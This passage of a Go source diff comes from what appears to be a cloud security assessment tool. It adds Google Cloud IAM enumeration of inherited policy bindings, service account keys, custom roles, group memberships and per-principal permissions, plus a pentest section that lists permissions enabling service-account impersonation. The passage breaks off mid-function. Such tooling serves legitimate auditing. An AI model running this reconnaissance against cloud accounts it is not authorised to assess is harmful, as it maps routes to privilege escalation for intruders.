"PUBLIC" + case member == "allAuthenticatedUsers": + return "ALL_AUTHENTICATED" + case 
strings.HasPrefix(member, "deleted:"): + return "Deleted" + case strings.HasPrefix(member, "projectOwner:"): + return "ProjectOwner" + case strings.HasPrefix(member, "projectEditor:"): + return "ProjectEditor" + case strings.HasPrefix(member, "projectViewer:"): + return "ProjectViewer" + case strings.HasPrefix(member, "principal:"): + return "WorkloadIdentity" + case strings.HasPrefix(member, "principalSet:"): + return "WorkloadIdentityPool" + default: return "Unknown" } } +// extractEmail extracts the clean email/identifier from a member string +func extractEmail(member string) string { + parts := strings.SplitN(member, ":", 2) + if len(parts) == 2 { + return parts[1] + } + return member +} + +// isCustomRole checks if a role is a custom role +func isCustomRole(role string) bool { + return strings.HasPrefix(role, "projects/") || strings.HasPrefix(role, "organizations/") +} + func (s *IAMService) PrincipalsWithRoles(resourceID string, resourceType string) ([]PrincipalWithRoles, error) { policyBindings, err := s.Policies(resourceID, resourceType) if err != nil { @@ -165,16 +356,463 @@ func (s *IAMService) PrincipalsWithRoles(resourceID string, resourceType string) principalMap := make(map[string]*PrincipalWithRoles) for _, pb := range policyBindings { for _, member := range pb.Members { - principalType := determinePrincipalType(member) // Implement this function based on member prefix + principalType := determinePrincipalType(member) if principal, ok := principalMap[member]; ok { principal.PolicyBindings = append(principal.PolicyBindings, pb) + // Track custom roles + if isCustomRole(pb.Role) && !contains(principal.CustomRoles, pb.Role) { + principal.CustomRoles = append(principal.CustomRoles, pb.Role) + principal.HasCustomRoles = true + } } else { + customRoles := []string{} + hasCustomRoles := false + if isCustomRole(pb.Role) { + customRoles = append(customRoles, pb.Role) + hasCustomRoles = true + } principalMap[member] = &PrincipalWithRoles{ Name: member, Type: 
principalType, + Email: extractEmail(member), PolicyBindings: []PolicyBinding{pb}, ResourceID: resourceID, ResourceType: resourceType, + HasCustomRoles: hasCustomRoles, + CustomRoles: customRoles, + } + } + } + } + + var principals []PrincipalWithRoles + for _, principal := range principalMap { + principals = append(principals, *principal) + } + + return principals, nil +} + +// contains checks if a string slice contains a specific string +func contains(slice []string, item string) bool { + for _, s := range slice { + if s == item { + return true + } + } + return false +} + +// ServiceAccounts retrieves all service accounts in a project with detailed info (including keys) +func (s *IAMService) ServiceAccounts(projectID string) ([]ServiceAccountInfo, error) { + return s.serviceAccountsInternal(projectID, true) +} + +// ServiceAccountsBasic retrieves service accounts without querying keys (faster, fewer permissions needed) +func (s *IAMService) ServiceAccountsBasic(projectID string) ([]ServiceAccountInfo, error) { + return s.serviceAccountsInternal(projectID, false) +} + +// serviceAccountsInternal retrieves service accounts with optional key enumeration +func (s *IAMService) serviceAccountsInternal(projectID string, includeKeys bool) ([]ServiceAccountInfo, error) { + ctx := context.Background() + iamService, err := s.getIAMService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "iam.googleapis.com") + } + + var serviceAccounts []ServiceAccountInfo + + // List all service accounts in the project + req := iamService.Projects.ServiceAccounts.List("projects/" + projectID) + err = req.Pages(ctx, func(page *iam.ListServiceAccountsResponse) error { + for _, sa := range page.Accounts { + saInfo := ServiceAccountInfo{ + Email: sa.Email, + Name: sa.Name, + ProjectID: projectID, + UniqueID: sa.UniqueId, + DisplayName: sa.DisplayName, + Description: sa.Description, + Disabled: sa.Disabled, + OAuth2ClientID: sa.Oauth2ClientId, + } + + // Get keys for this 
service account (only if requested) + if includeKeys { + keys, err := s.getServiceAccountKeys(ctx, iamService, sa.Name) + if err != nil { + // Log but don't fail - we might not have permission + parsedErr := gcpinternal.ParseGCPError(err, "iam.googleapis.com") + gcpinternal.HandleGCPError(parsedErr, logger, globals.GCP_IAM_MODULE_NAME, + fmt.Sprintf("Could not list keys for %s", sa.Email)) + } else { + saInfo.Keys = keys + // Count user-managed keys only + userManagedCount := 0 + for _, key := range keys { + if key.KeyType == "USER_MANAGED" { + userManagedCount++ + } + } + saInfo.KeyCount = userManagedCount + saInfo.HasKeys = userManagedCount > 0 + } + } + + serviceAccounts = append(serviceAccounts, saInfo) + } + return nil + }) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "iam.googleapis.com") + } + + return serviceAccounts, nil +} + +// getServiceAccountKeys retrieves keys for a service account +func (s *IAMService) getServiceAccountKeys(ctx context.Context, iamService *iam.Service, saName string) ([]ServiceAccountKeyInfo, error) { + var keys []ServiceAccountKeyInfo + + resp, err := iamService.Projects.ServiceAccounts.Keys.List(saName).Context(ctx).Do() + if err != nil { + return nil, err + } + + for _, key := range resp.Keys { + keyInfo := ServiceAccountKeyInfo{ + Name: key.Name, + KeyAlgorithm: key.KeyAlgorithm, + KeyOrigin: key.KeyOrigin, + KeyType: key.KeyType, + Disabled: key.Disabled, + } + + // Parse timestamps + if key.ValidAfterTime != "" { + if t, err := time.Parse(time.RFC3339, key.ValidAfterTime); err == nil { + keyInfo.ValidAfter = t + } + } + if key.ValidBeforeTime != "" { + if t, err := time.Parse(time.RFC3339, key.ValidBeforeTime); err == nil { + keyInfo.ValidBefore = t + } + } + + keys = append(keys, keyInfo) + } + + return keys, nil +} + +// CustomRoles retrieves all custom roles in a project +func (s *IAMService) CustomRoles(projectID string) ([]CustomRole, error) { + ctx := context.Background() + iamService, err := 
s.getIAMService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "iam.googleapis.com") + } + + var customRoles []CustomRole + + // List project-level custom roles + req := iamService.Projects.Roles.List("projects/" + projectID) + req.ShowDeleted(true) // Include deleted roles for security awareness + err = req.Pages(ctx, func(page *iam.ListRolesResponse) error { + for _, role := range page.Roles { + customRole := CustomRole{ + Name: role.Name, + Title: role.Title, + Description: role.Description, + IncludedPermissions: role.IncludedPermissions, + Stage: role.Stage, + Deleted: role.Deleted, + Etag: role.Etag, + ProjectID: projectID, + IsProjectLevel: true, + PermissionCount: len(role.IncludedPermissions), + } + customRoles = append(customRoles, customRole) + } + return nil + }) + if err != nil { + // Don't fail completely - we might just not have access to list roles + parsedErr := gcpinternal.ParseGCPError(err, "iam.googleapis.com") + gcpinternal.HandleGCPError(parsedErr, logger, globals.GCP_IAM_MODULE_NAME, + fmt.Sprintf("Could not list custom roles for project %s", projectID)) + } + + return customRoles, nil +} + +// PoliciesWithInheritance fetches IAM policies including inherited ones from folders and organization +func (s *IAMService) PoliciesWithInheritance(projectID string) ([]PolicyBinding, error) { + ctx := context.Background() + + // Get project's ancestry + ancestry, err := s.projectAncestry(projectID) + if err != nil { + // If we can't get ancestry, just return project-level policies + gcpinternal.HandleGCPError(err, logger, globals.GCP_IAM_MODULE_NAME, + fmt.Sprintf("Could not get ancestry for project %s, returning project-level policies only", projectID)) + return s.Policies(projectID, "project") + } + + var allBindings []PolicyBinding + + // Get policies for each resource in the ancestry (org -> folders -> project) + for _, resource := range ancestry { + bindings, err := s.getPoliciesForResource(ctx, resource.Id, resource.Type) + if 
err != nil { + gcpinternal.HandleGCPError(err, logger, globals.GCP_IAM_MODULE_NAME, + fmt.Sprintf("Could not get policies for %s/%s", resource.Type, resource.Id)) + continue + } + + // Mark inherited bindings + for i := range bindings { + if resource.Type != "project" || resource.Id != projectID { + bindings[i].IsInherited = true + bindings[i].InheritedFrom = fmt.Sprintf("%s/%s", resource.Type, resource.Id) + } + } + + allBindings = append(allBindings, bindings...) + } + + return allBindings, nil +} + +// policyCache caches successful policy lookups per resource +var policyCache = make(map[string][]PolicyBinding) + +// policyFailureCache tracks resources we've already failed to get policies for +var policyFailureCache = make(map[string]bool) + +// getPoliciesForResource fetches policies for a specific resource using the appropriate client +func (s *IAMService) getPoliciesForResource(ctx context.Context, resourceID string, resourceType string) ([]PolicyBinding, error) { + cacheKey := resourceType + "/" + resourceID + + // Check success cache first + if bindings, ok := policyCache[cacheKey]; ok { + return bindings, nil + } + + // Check failure cache - return permission denied without logging again + if policyFailureCache[cacheKey] { + return nil, gcpinternal.ErrPermissionDenied + } + + var resourceName string + + switch resourceType { + case "project": + var client *resourcemanager.ProjectsClient + var err error + if s.session != nil { + client, err = resourcemanager.NewProjectsClient(ctx, s.session.GetClientOption()) + } else { + client, err = resourcemanager.NewProjectsClient(ctx) + } + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "cloudresourcemanager.googleapis.com") + } + defer client.Close() + + resourceName = "projects/" + resourceID + policy, err := client.GetIamPolicy(ctx, &iampb.GetIamPolicyRequest{Resource: resourceName}) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "cloudresourcemanager.googleapis.com") + } + bindings := 
convertPolicyToBindings(policy, resourceID, resourceType, resourceName) + policyCache[cacheKey] = bindings + return bindings, nil + + case "folder": + var client *resourcemanager.FoldersClient + var err error + if s.session != nil { + client, err = resourcemanager.NewFoldersClient(ctx, s.session.GetClientOption()) + } else { + client, err = resourcemanager.NewFoldersClient(ctx) + } + if err != nil { + policyFailureCache[cacheKey] = true + return nil, gcpinternal.ParseGCPError(err, "cloudresourcemanager.googleapis.com") + } + defer client.Close() + + resourceName = "folders/" + resourceID + policy, err := client.GetIamPolicy(ctx, &iampb.GetIamPolicyRequest{Resource: resourceName}) + if err != nil { + policyFailureCache[cacheKey] = true + return nil, gcpinternal.ParseGCPError(err, "cloudresourcemanager.googleapis.com") + } + bindings := convertPolicyToBindings(policy, resourceID, resourceType, resourceName) + policyCache[cacheKey] = bindings + return bindings, nil + + case "organization": + var client *resourcemanager.OrganizationsClient + var err error + if s.session != nil { + client, err = resourcemanager.NewOrganizationsClient(ctx, s.session.GetClientOption()) + } else { + client, err = resourcemanager.NewOrganizationsClient(ctx) + } + if err != nil { + policyFailureCache[cacheKey] = true + return nil, gcpinternal.ParseGCPError(err, "cloudresourcemanager.googleapis.com") + } + defer client.Close() + + resourceName = "organizations/" + resourceID + policy, err := client.GetIamPolicy(ctx, &iampb.GetIamPolicyRequest{Resource: resourceName}) + if err != nil { + policyFailureCache[cacheKey] = true + return nil, gcpinternal.ParseGCPError(err, "cloudresourcemanager.googleapis.com") + } + bindings := convertPolicyToBindings(policy, resourceID, resourceType, resourceName) + policyCache[cacheKey] = bindings + return bindings, nil + + default: + return nil, fmt.Errorf("unsupported resource type: %s", resourceType) + } +} + +// convertPolicyToBindings converts an IAM policy 
to PolicyBinding slice +func convertPolicyToBindings(policy *iampb.Policy, resourceID, resourceType, resourceName string) []PolicyBinding { + var bindings []PolicyBinding + for _, binding := range policy.Bindings { + pb := PolicyBinding{ + Role: binding.Role, + Members: binding.Members, + ResourceID: resourceID, + ResourceType: resourceType, + PolicyName: resourceName + "_policyBindings", + } + + // Parse condition if present + if binding.Condition != nil { + pb.Condition = binding.Condition.String() + pb.HasCondition = true + pb.ConditionInfo = &IAMCondition{ + Title: binding.Condition.Title, + Description: binding.Condition.Description, + Expression: binding.Condition.Expression, + } + } + + bindings = append(bindings, pb) + } + return bindings +} + +// CombinedIAM retrieves all IAM-related data for a project +func (s *IAMService) CombinedIAM(projectID string) (CombinedIAMData, error) { + var data CombinedIAMData + + // Get principals with roles (includes inheritance tracking) + principals, err := s.PrincipalsWithRolesEnhanced(projectID) + if err != nil { + return data, fmt.Errorf("failed to get principals: %v", err) + } + data.Principals = principals + + // Get service accounts (without keys - use ServiceAccounts() if keys needed) + serviceAccounts, err := s.ServiceAccountsBasic(projectID) + if err != nil { + // Don't fail completely + gcpinternal.HandleGCPError(err, logger, globals.GCP_IAM_MODULE_NAME, + "Could not get service accounts") + } else { + data.ServiceAccounts = serviceAccounts + } + + // Get custom roles + customRoles, err := s.CustomRoles(projectID) + if err != nil { + gcpinternal.HandleGCPError(err, logger, globals.GCP_IAM_MODULE_NAME, + "Could not get custom roles") + } else { + data.CustomRoles = customRoles + } + + // Extract groups from principals + var groups []GroupInfo + groupMap := make(map[string]*GroupInfo) + for _, p := range principals { + if p.Type == "Group" { + if _, exists := groupMap[p.Email]; !exists { + groupMap[p.Email] = 
&GroupInfo{ + Email: p.Email, + ProjectID: projectID, + Roles: []string{}, + } + } + for _, binding := range p.PolicyBindings { + groupMap[p.Email].Roles = append(groupMap[p.Email].Roles, binding.Role) + } + } + } + for _, g := range groupMap { + groups = append(groups, *g) + } + data.Groups = groups + + return data, nil +} + +// PrincipalsWithRolesEnhanced gets principals with roles including inheritance info +func (s *IAMService) PrincipalsWithRolesEnhanced(projectID string) ([]PrincipalWithRoles, error) { + policyBindings, err := s.PoliciesWithInheritance(projectID) + if err != nil { + return nil, err + } + + principalMap := make(map[string]*PrincipalWithRoles) + for _, pb := range policyBindings { + for _, member := range pb.Members { + principalType := determinePrincipalType(member) + // Create a binding copy for this principal + principalBinding := PolicyBinding{ + Role: pb.Role, + Members: []string{member}, + ResourceID: pb.ResourceID, + ResourceType: pb.ResourceType, + Condition: pb.Condition, + PolicyName: pb.PolicyName, + IsInherited: pb.IsInherited, + InheritedFrom: pb.InheritedFrom, + } + + if principal, ok := principalMap[member]; ok { + principal.PolicyBindings = append(principal.PolicyBindings, principalBinding) + // Track custom roles + if isCustomRole(pb.Role) && !contains(principal.CustomRoles, pb.Role) { + principal.CustomRoles = append(principal.CustomRoles, pb.Role) + principal.HasCustomRoles = true + } + } else { + customRoles := []string{} + hasCustomRoles := false + if isCustomRole(pb.Role) { + customRoles = append(customRoles, pb.Role) + hasCustomRoles = true + } + principalMap[member] = &PrincipalWithRoles{ + Name: member, + Type: principalType, + Email: extractEmail(member), + PolicyBindings: []PolicyBinding{principalBinding}, + ResourceID: projectID, + ResourceType: "project", + HasCustomRoles: hasCustomRoles, + CustomRoles: customRoles, } } } @@ -187,3 +825,1162 @@ func (s *IAMService) PrincipalsWithRoles(resourceID string, resourceType 
string) return principals, nil } + +// GetMemberType returns the member type for display purposes +func GetMemberType(member string) string { + return determinePrincipalType(member) +} + +// GetRolesForServiceAccount returns all roles assigned to a service account in a project +// This includes both direct project-level bindings and inherited bindings from folders/org +func (s *IAMService) GetRolesForServiceAccount(projectID string, saEmail string) ([]string, error) { + // Get all bindings with inheritance + bindings, err := s.PoliciesWithInheritance(projectID) + if err != nil { + return nil, err + } + + // Find roles for this service account + saFullIdentifier := "serviceAccount:" + saEmail + rolesSet := make(map[string]bool) + + for _, binding := range bindings { + for _, member := range binding.Members { + if member == saFullIdentifier { + rolesSet[binding.Role] = true + } + } + } + + // Convert to slice + var roles []string + for role := range rolesSet { + roles = append(roles, role) + } + + return roles, nil +} + +// FormatRolesShort formats roles for compact table display +// Extracts just the role name from the full path and abbreviates common prefixes +func FormatRolesShort(roles []string) string { + if len(roles) == 0 { + return "-" + } + + var shortRoles []string + for _, role := range roles { + // Extract role name from full path + shortRole := role + + // Handle different role formats + if strings.HasPrefix(role, "roles/") { + shortRole = strings.TrimPrefix(role, "roles/") + } else if strings.Contains(role, "/roles/") { + // Custom role: projects/xxx/roles/MyRole or organizations/xxx/roles/MyRole + parts := strings.Split(role, "/roles/") + if len(parts) == 2 { + shortRole = parts[1] + " (custom)" + } + } + + shortRoles = append(shortRoles, shortRole) + } + + return strings.Join(shortRoles, ", ") +} + +// PermissionEntry represents a single permission with its source information +type PermissionEntry struct { + Permission string `json:"permission"` + 
Role string `json:"role"` + RoleType string `json:"roleType"` // "predefined", "custom", "basic" + ResourceID string `json:"resourceId"` + ResourceType string `json:"resourceType"` + IsInherited bool `json:"isInherited"` + InheritedFrom string `json:"inheritedFrom"` + HasCondition bool `json:"hasCondition"` + Condition string `json:"condition"` +} + +// EntityPermissions represents all permissions for an entity +type EntityPermissions struct { + Entity string `json:"entity"` + EntityType string `json:"entityType"` + Email string `json:"email"` + ProjectID string `json:"projectId"` + Permissions []PermissionEntry `json:"permissions"` + Roles []string `json:"roles"` + TotalPerms int `json:"totalPerms"` + UniquePerms int `json:"uniquePerms"` +} + +// RolePermissions caches role to permissions mapping +var rolePermissionsCache = make(map[string][]string) + +// rolePermissionsFailureCache tracks roles we've already failed to look up (to avoid duplicate error logs) +var rolePermissionsFailureCache = make(map[string]bool) + +// orgRoleAccessChecked tracks if we've already tried to access org-level custom roles +var orgRoleAccessChecked bool +var orgRoleAccessAvailable bool + +// GetRolePermissions retrieves the permissions for a given role +func (s *IAMService) GetRolePermissions(ctx context.Context, roleName string) ([]string, error) { + // Check cache first + if perms, ok := rolePermissionsCache[roleName]; ok { + return perms, nil + } + + // Check if we've already failed to look up this role + if rolePermissionsFailureCache[roleName] { + return nil, gcpinternal.ErrPermissionDenied + } + + iamService, err := s.getIAMService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "iam.googleapis.com") + } + + var permissions []string + + // Handle different role types + if strings.HasPrefix(roleName, "roles/") { + // Predefined role + role, err := iamService.Roles.Get(roleName).Context(ctx).Do() + if err != nil { + return nil, gcpinternal.ParseGCPError(err, 
"iam.googleapis.com") + } + permissions = role.IncludedPermissions + } else if strings.HasPrefix(roleName, "projects/") { + // Project-level custom role + role, err := iamService.Projects.Roles.Get(roleName).Context(ctx).Do() + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "iam.googleapis.com") + } + permissions = role.IncludedPermissions + } else if strings.HasPrefix(roleName, "organizations/") { + // Organization-level custom role + // Check if we already know org roles are inaccessible + if orgRoleAccessChecked && !orgRoleAccessAvailable { + rolePermissionsFailureCache[roleName] = true + return nil, gcpinternal.ErrPermissionDenied + } + + role, err := iamService.Organizations.Roles.Get(roleName).Context(ctx).Do() + if err != nil { + // Cache the failure to avoid repeated error logs + rolePermissionsFailureCache[roleName] = true + + // Check if this is a permission error - if so, mark org roles as inaccessible + parsedErr := gcpinternal.ParseGCPError(err, "iam.googleapis.com") + if gcpinternal.IsPermissionDenied(parsedErr) && !orgRoleAccessChecked { + orgRoleAccessChecked = true + orgRoleAccessAvailable = false + // Log once that org-level custom roles are not accessible + logger.InfoM("Organization-level custom roles not accessible - role permissions will not be expanded", globals.GCP_IAM_MODULE_NAME) + } + return nil, parsedErr + } + + // Mark org role access as available on first success + if !orgRoleAccessChecked { + orgRoleAccessChecked = true + orgRoleAccessAvailable = true + } + permissions = role.IncludedPermissions + } + + // Cache the result + rolePermissionsCache[roleName] = permissions + return permissions, nil +} + +// GetRoleType determines the type of role +func GetRoleType(roleName string) string { + switch { + case strings.HasPrefix(roleName, "roles/owner") || strings.HasPrefix(roleName, "roles/editor") || strings.HasPrefix(roleName, "roles/viewer"): + return "basic" + case strings.HasPrefix(roleName, "projects/") || 
strings.HasPrefix(roleName, "organizations/"): + return "custom" + default: + return "predefined" + } +} + +// GetEntityPermissions retrieves all permissions for a specific entity +func (s *IAMService) GetEntityPermissions(ctx context.Context, projectID string, entity string) (*EntityPermissions, error) { + // Get all bindings with inheritance + bindings, err := s.PoliciesWithInheritance(projectID) + if err != nil { + return nil, err + } + + entityPerms := &EntityPermissions{ + Entity: entity, + EntityType: determinePrincipalType(entity), + Email: extractEmail(entity), + ProjectID: projectID, + Permissions: []PermissionEntry{}, + Roles: []string{}, + } + + // Track unique permissions + uniquePerms := make(map[string]bool) + rolesSet := make(map[string]bool) + + // Process each binding + for _, binding := range bindings { + // Check if this entity is in the binding + found := false + for _, member := range binding.Members { + if member == entity { + found = true + break + } + } + if !found { + continue + } + + // Track the role + if !rolesSet[binding.Role] { + rolesSet[binding.Role] = true + entityPerms.Roles = append(entityPerms.Roles, binding.Role) + } + + // Get permissions for this role + permissions, err := s.GetRolePermissions(ctx, binding.Role) + if err != nil { + // Only log if this role wasn't already in the failure cache (to avoid duplicate messages) + // and if we haven't already determined org roles are inaccessible + isOrgRole := strings.HasPrefix(binding.Role, "organizations/") + if isOrgRole && orgRoleAccessChecked && !orgRoleAccessAvailable { + // Skip logging for org roles we know we can't access + continue + } + gcpinternal.HandleGCPError(err, logger, globals.GCP_IAM_MODULE_NAME, + fmt.Sprintf("Could not get permissions for role %s", binding.Role)) + continue + } + + // Create permission entries + for _, perm := range permissions { + permEntry := PermissionEntry{ + Permission: perm, + Role: binding.Role, + RoleType: GetRoleType(binding.Role), + 
ResourceID: binding.ResourceID, + ResourceType: binding.ResourceType, + IsInherited: binding.IsInherited, + InheritedFrom: binding.InheritedFrom, + HasCondition: binding.HasCondition, + } + if binding.ConditionInfo != nil { + permEntry.Condition = binding.ConditionInfo.Title + } + + entityPerms.Permissions = append(entityPerms.Permissions, permEntry) + + if !uniquePerms[perm] { + uniquePerms[perm] = true + } + } + } + + entityPerms.TotalPerms = len(entityPerms.Permissions) + entityPerms.UniquePerms = len(uniquePerms) + + return entityPerms, nil +} + +// GetAllEntityPermissions retrieves permissions for all entities in a project +func (s *IAMService) GetAllEntityPermissions(projectID string) ([]EntityPermissions, error) { + ctx := context.Background() + + // Get all principals + principals, err := s.PrincipalsWithRolesEnhanced(projectID) + if err != nil { + return nil, err + } + + var allPerms []EntityPermissions + + for _, principal := range principals { + entityPerms, err := s.GetEntityPermissions(ctx, projectID, principal.Name) + if err != nil { + gcpinternal.HandleGCPError(err, logger, globals.GCP_IAM_MODULE_NAME, + fmt.Sprintf("Could not get permissions for %s", principal.Name)) + continue + } + allPerms = append(allPerms, *entityPerms) + } + + return allPerms, nil +} + +// GetGroupMembership retrieves members of a Google Group using Cloud Identity API +// Requires cloudidentity.groups.readonly or cloudidentity.groups scope +func (s *IAMService) GetGroupMembership(ctx context.Context, groupEmail string) (*GroupInfo, error) { + ciService, err := s.getCloudIdentityService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "cloudidentity.googleapis.com") + } + + groupInfo := &GroupInfo{ + Email: groupEmail, + Members: []GroupMember{}, + } + + // First, look up the group to get its resource name + // Cloud Identity uses groups/{group_id} format + lookupReq := ciService.Groups.Lookup() + lookupReq.GroupKeyId(groupEmail) + + lookupResp, err := 
lookupReq.Do() + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "cloudidentity.googleapis.com") + } + + groupName := lookupResp.Name + + // Get group details + group, err := ciService.Groups.Get(groupName).Do() + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "cloudidentity.googleapis.com") + } + + groupInfo.DisplayName = group.DisplayName + groupInfo.Description = group.Description + + // List memberships + membershipsReq := ciService.Groups.Memberships.List(groupName) + err = membershipsReq.Pages(ctx, func(page *cloudidentity.ListMembershipsResponse) error { + for _, membership := range page.Memberships { + member := GroupMember{ + Role: membership.Roles[0].Name, // OWNER, MANAGER, MEMBER + } + + // Get member details from preferredMemberKey + if membership.PreferredMemberKey != nil { + member.Email = membership.PreferredMemberKey.Id + } + + // Determine member type + if membership.Type == "GROUP" { + member.Type = "GROUP" + groupInfo.NestedGroups = append(groupInfo.NestedGroups, member.Email) + groupInfo.HasNestedGroups = true + } else if strings.HasSuffix(member.Email, ".iam.gserviceaccount.com") { + member.Type = "SERVICE_ACCOUNT" + } else { + member.Type = "USER" + } + + groupInfo.Members = append(groupInfo.Members, member) + } + return nil + }) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "cloudidentity.googleapis.com") + } + + groupInfo.MemberCount = len(groupInfo.Members) + groupInfo.MembershipEnumerated = true + + return groupInfo, nil +} + +// cloudIdentityAPIChecked tracks whether we've already checked Cloud Identity API availability +var cloudIdentityAPIChecked bool +var cloudIdentityAPIAvailable bool + +// GetGroupMemberships retrieves members for all groups found in IAM bindings +func (s *IAMService) GetGroupMemberships(ctx context.Context, groups []GroupInfo) []GroupInfo { + var enrichedGroups []GroupInfo + + // Skip if we already know Cloud Identity API is not available + if cloudIdentityAPIChecked && 
!cloudIdentityAPIAvailable { + // Return groups as-is without attempting enumeration + for _, group := range groups { + group.MembershipEnumerated = false + enrichedGroups = append(enrichedGroups, group) + } + return enrichedGroups + } + + for i, group := range groups { + enrichedGroup, err := s.GetGroupMembership(ctx, group.Email) + if err != nil { + // Check if this is an API not enabled error + errStr := err.Error() + if strings.Contains(errStr, "API not enabled") || strings.Contains(errStr, "has not been used") || + strings.Contains(errStr, "cloudidentity.googleapis.com") { + // Mark API as unavailable to skip future attempts + if !cloudIdentityAPIChecked { + cloudIdentityAPIChecked = true + cloudIdentityAPIAvailable = false + logger.InfoM("Cloud Identity API not available - skipping group membership enumeration", globals.GCP_IAM_MODULE_NAME) + } + // Return remaining groups without attempting enumeration + for j := i; j < len(groups); j++ { + groups[j].MembershipEnumerated = false + enrichedGroups = append(enrichedGroups, groups[j]) + } + return enrichedGroups + } + + // Log other errors but continue trying other groups + gcpinternal.HandleGCPError(err, logger, globals.GCP_IAM_MODULE_NAME, + fmt.Sprintf("Could not enumerate membership for group %s", group.Email)) + // Keep the original group info without membership + group.MembershipEnumerated = false + enrichedGroups = append(enrichedGroups, group) + continue + } + + // Mark API as available on first success + if !cloudIdentityAPIChecked { + cloudIdentityAPIChecked = true + cloudIdentityAPIAvailable = true + } + + // Preserve the roles from the original group + enrichedGroup.Roles = group.Roles + enrichedGroup.ProjectID = group.ProjectID + enrichedGroups = append(enrichedGroups, *enrichedGroup) + } + + return enrichedGroups +} + +// ExpandGroupPermissions expands permissions to include inherited permissions from group membership +// This creates permission entries for group members based on the group's 
permissions +func (s *IAMService) ExpandGroupPermissions(ctx context.Context, projectID string, entityPerms []EntityPermissions) ([]EntityPermissions, error) { + // Find all groups in the entity permissions + groupPermsMap := make(map[string]*EntityPermissions) + for i := range entityPerms { + if entityPerms[i].EntityType == "Group" { + groupPermsMap[entityPerms[i].Entity] = &entityPerms[i] + } + } + + if len(groupPermsMap) == 0 { + return entityPerms, nil + } + + // Try to enumerate group memberships + var groupInfos []GroupInfo + for groupEmail := range groupPermsMap { + groupInfos = append(groupInfos, GroupInfo{Email: groupEmail, ProjectID: projectID}) + } + + enrichedGroups := s.GetGroupMemberships(ctx, groupInfos) + + // Create a map of member to their inherited permissions from groups + memberInheritedPerms := make(map[string][]PermissionEntry) + + for _, group := range enrichedGroups { + if !group.MembershipEnumerated { + continue + } + + groupPerms := groupPermsMap["group:"+group.Email] + if groupPerms == nil { + continue + } + + // For each member of the group, add the group's permissions as inherited + for _, member := range group.Members { + memberKey := "" + switch member.Type { + case "USER": + memberKey = "user:" + member.Email + case "SERVICE_ACCOUNT": + memberKey = "serviceAccount:" + member.Email + case "GROUP": + memberKey = "group:" + member.Email + } + + if memberKey == "" { + continue + } + + // Create inherited permission entries + for _, perm := range groupPerms.Permissions { + inheritedPerm := PermissionEntry{ + Permission: perm.Permission, + Role: perm.Role, + RoleType: perm.RoleType, + ResourceID: perm.ResourceID, + ResourceType: perm.ResourceType, + IsInherited: true, + InheritedFrom: fmt.Sprintf("group:%s", group.Email), + HasCondition: perm.HasCondition, + Condition: perm.Condition, + } + memberInheritedPerms[memberKey] = append(memberInheritedPerms[memberKey], inheritedPerm) + } + } + } + + // Add inherited permissions to existing 
entities or create new ones + entityMap := make(map[string]*EntityPermissions) + for i := range entityPerms { + entityMap[entityPerms[i].Entity] = &entityPerms[i] + } + + for memberKey, inheritedPerms := range memberInheritedPerms { + if existing, ok := entityMap[memberKey]; ok { + // Add inherited permissions to existing entity + existing.Permissions = append(existing.Permissions, inheritedPerms...) + existing.TotalPerms = len(existing.Permissions) + // Recalculate unique perms + uniquePerms := make(map[string]bool) + for _, p := range existing.Permissions { + uniquePerms[p.Permission] = true + } + existing.UniquePerms = len(uniquePerms) + } else { + // Create new entity entry for this group member + newEntity := EntityPermissions{ + Entity: memberKey, + EntityType: determinePrincipalType(memberKey), + Email: extractEmail(memberKey), + ProjectID: projectID, + Permissions: inheritedPerms, + Roles: []string{}, // Roles are inherited via group + TotalPerms: len(inheritedPerms), + } + // Calculate unique perms + uniquePerms := make(map[string]bool) + for _, p := range inheritedPerms { + uniquePerms[p.Permission] = true + } + newEntity.UniquePerms = len(uniquePerms) + entityPerms = append(entityPerms, newEntity) + } + } + + return entityPerms, nil +} + +// GetAllEntityPermissionsWithGroupExpansion retrieves permissions with group membership expansion +func (s *IAMService) GetAllEntityPermissionsWithGroupExpansion(projectID string) ([]EntityPermissions, []GroupInfo, error) { + ctx := context.Background() + + // Get base permissions + entityPerms, err := s.GetAllEntityPermissions(projectID) + if err != nil { + return nil, nil, err + } + + // Find groups + var groups []GroupInfo + for _, ep := range entityPerms { + if ep.EntityType == "Group" { + groups = append(groups, GroupInfo{ + Email: ep.Email, + ProjectID: projectID, + Roles: ep.Roles, + }) + } + } + + // Try to enumerate group memberships + enrichedGroups := s.GetGroupMemberships(ctx, groups) + + // Expand 
permissions based on group membership + expandedPerms, err := s.ExpandGroupPermissions(ctx, projectID, entityPerms) + if err != nil { + gcpinternal.HandleGCPError(err, logger, globals.GCP_IAM_MODULE_NAME, + "Could not expand group permissions") + return entityPerms, enrichedGroups, nil + } + + return expandedPerms, enrichedGroups, nil +} + +// ============================================================================ +// PENTEST: Service Account Impersonation Analysis +// ============================================================================ + +// Dangerous permissions for SA impersonation/abuse +var saImpersonationPermissions = map[string]string{ + "iam.serviceAccounts.getAccessToken": "tokenCreator", + "iam.serviceAccountKeys.create": "keyCreator", + "iam.serviceAccounts.signBlob": "signBlob", + "iam.serviceAccounts.signJwt": "signJwt", + "iam.serviceAccounts.implicitDelegation": "implicitDelegation", + "iam.serviceAccounts.actAs": "actAs", +} + +// GetServiceAccountIAMPolicy gets the IAM policy for a specific service account +func (s *IAMService) GetServiceAccountIAMPolicy(ctx context.Context, saEmail string, projectID string) (*SAImpersonationInfo, error) { + iamService, err := s.getIAMService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "iam.googleapis.com") + } + + saResource := fmt.Sprintf("projects/%s/serviceAccounts/%s", projectID, saEmail) + + policy, err := iamService.Projects.ServiceAccounts.GetIamPolicy(saResource).Context(ctx).Do() + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "iam.googleapis.com") + } + + info := &SAImpersonationInfo{ + ServiceAccount: saEmail, + ProjectID: projectID, + RiskReasons: []string{}, + } + + // Analyze each binding + for _, binding := range policy.Bindings { + role := binding.Role + members := binding.Members + + // Check for specific dangerous roles + 